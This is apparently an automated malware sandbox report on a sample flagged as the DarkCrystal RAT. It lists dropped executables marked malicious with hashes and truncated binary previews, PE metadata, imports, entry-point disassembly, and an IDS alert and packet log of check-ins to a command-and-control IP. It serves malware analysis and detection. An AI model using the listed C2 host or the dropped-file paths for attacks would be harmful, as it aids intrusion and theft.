                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (628), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):628
                                                                                                Entropy (8bit):5.881347945042169
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:t9844dUEwQGplBRXTU7jy1DLr+3TDniGVKLPpqWteJoocm2TQkfA9oQHcEzeToL:t9844dGrBRXw7j0LZbpqWjfY9NVzb
                                                                                                MD5:17C3999EC55F50F2E76F350289A46C1A
                                                                                                SHA1:034AFD9B7492693D13B2F84C1B0175D2D56BBC62
                                                                                                SHA-256:579DE4040D7A4301002B90D8B4363E3635A75A4918DFB7CCF5CFAAC50B68AF85
                                                                                                SHA-512:D5D0A8A54F01DA746A8B502B8042324104DA79830D1A1770B0B4313BFC2FBB2B837792C08739278B6A1D1D02E3AC77AEED216F20BD04DF38B9D877003D387621
                                                                                                Malicious:false
                                                                                                Preview:6vOpOtUdnJbODOiQosrxi7vvDPYaOAp79RMgHTQkPCyUT12icXNmDgD9Adl9V4OmedOvBCJUcHigIabLX071wD4dONforROUxLz0nHgZO2J57h1jCale6X0bjuhygfnL2Ns6lliQTin438fqW6lRpuYaVYQ2ks3tP8Dtz48a1VLYu6hlP0ck3VgIzRkMVqqlo4o55v1b7LaTjAqZ1pmtQTz3b44hUvFKpjtzRmqd9Ams5MjzlKVqD6VVEvdA1TGLFPn9Q0IO8JtPqH7PVE5JaZGsOYvfIplq3ampijiuCGr4NGo6xOowX7vpJ5v2FmGThDVQfSqvgLHTsMeItys3BzS6o6gnyqpZ9XWKuXbfi3QM0b77amIR4MSsuZlivD6zfrTUzUXVWMVHiFGN9iMLiYfxFnaVw3te6brIHmHGPw4r0KKoSYjM0uRHLgPL4Bjdc1LHY7FWaG6vdx65dvCXUgoLKj7lX5LNMbP98DPVSMwtyfnXkTsI9LI5M96yAe8f4siCi66ZfrEHu4Xo6jADNDOBSTx8GaUyNQyF6kznXTmRGBKRmS2bd5S1ehtPJ7TEWQ4dFRsVtXq3a64RIfVyi3US87lY1jeZ9h40GrLVjgrGOYbhnbHn

                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....

                                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.777999706692488
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXXtQv7qTqvvpYWyLAHKvj:Vx993DEUstOSWyYs
                                                                                                MD5:59EDE95D0E4A5DFA4441E13CF348F605
                                                                                                SHA1:53B30ED72170CA3CD73E9FA6C43F81B2905985FC
                                                                                                SHA-256:96DFFDD95C78165486E4017882814FAA15565EA39E88FE3B13BFE2B530DE9089
                                                                                                SHA-512:004040F5014A8A2FA5959212C6E6D0AB67DDC76E250E64B3AB2F3D2F97EBCA134A2A25521829D4D2DA07D7D251C275FDCDFCF9E1D34971D9135476415527EBEE
                                                                                                Malicious:false
                                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 10/01/2025 03:30:38..03:30:38, error: 0x80072746.03:30:43, error: 0x80072746.

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.658372439681941
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:hz7DzW2Yop.exe
                                                                                                File size:2'926'873 bytes
                                                                                                MD5:46dcddd43cbaeae845c14e7306726ff2
                                                                                                SHA1:4952a7cd01795d736450074433337d2a544b1e50
                                                                                                SHA256:ab98b91a647e45e348db97bd277efcc122d10d45a5891bfac3d627f3a865b580
                                                                                                SHA512:f7e628e12188e72a89617c1ae677fa3374b831ad91ec159b3138452d633a9fa46f789f17e9336476e3e0e00b532c53bf207777fd4d2703d3677fb18bc15c78a7
                                                                                                SSDEEP:49152:HBmFP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPtu:hmPpicQSwYne++govnizu
TLSH: 03D5D006B1A28E33D2643F39A9D7012E93B0D7627E12DF5B361E5095AD462708B673F3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
Icon Hash: 0124804c64000000
Entrypoint: 0x41f530
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 12e12319f1029ec4f8fcbed7e82df162
Instruction
call 00007F8AF08269EBh
jmp 00007F8AF08262FDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8AF0819147h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F8AF082978Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F8AF082648Ch
push 0000000Ch
push esi
call 00007F8AF0825A49h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F8AF08190C2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F8AF0829249h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F8AF0826408h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F8AF082922Ch
int3
jmp 00007F8AF082ACC7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x57a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0x57a8 | 0x5800 | b02b3b6101a2b8c19d40c58e3310fcff | False | 0.6669034090909091 | data | 6.694018179144421 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6a000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x6506c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66618 | 0xe43 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9068748288140236
RT_DIALOG | 0x6745c | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x676e4 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x67820 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x6790c | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x67a3c | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x67d74 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x67fc8 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x681ac | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x68378 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x68530 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x68678 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x68ae4 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x68c4c | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x68da0 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x68eac | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x68f68 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x69040 | 0x14 | data | | | 1.05
RT_MANIFEST | 0x69054 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T07:57:31.379268+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49736 | 89.23.100.242 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 07:57:30.524283886 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:30.529469013 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:30.529670954 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:30.531393051 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:30.536446095 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:30.877572060 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:30.882489920 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.274888992 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.379204035 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.379251003 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.379267931 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.429939985 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.434773922 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.514209032 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.519072056 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.519167900 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.519287109 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.524125099 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.670556068 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.670717001 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.675589085 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.876787901 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.881737947 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.881766081 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.881773949 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.931037903 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:31.952721119 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:31.957629919 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.194262981 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.194561958 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.199501991 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.199573994 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.255752087 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.360888958 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.408117056 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.441204071 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.470607996 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.517034054 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.601072073 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.601514101 CET | 49738 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.606215000 CET | 80 | 49736 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.606281996 CET | 49736 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.606338978 CET | 80 | 49738 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.606401920 CET | 49738 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.606549025 CET | 49738 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.609419107 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.611416101 CET | 80 | 49738 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.614398003 CET | 80 | 49737 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.614497900 CET | 49737 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.956928015 CET | 49738 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:32.962167025 CET | 80 | 49738 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.962188005 CET | 80 | 49738 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:32.962199926 CET | 80 | 49738 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:33.361191988 CET | 80 | 49738 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:33.489578009 CET | 49739 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.495035887 CET | 80 | 49739 | 89.23.100.242 | 192.168.2.4
Jan 10, 2025 07:57:33.495337009 CET | 49739 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.496103048 CET | 49739 | 80 | 192.168.2.4 | 89.23.100.242
Jan 10, 2025 07:57:33.496560097 CET | 80 | 49738 | 89.23.100.242 | 192.168.2.4
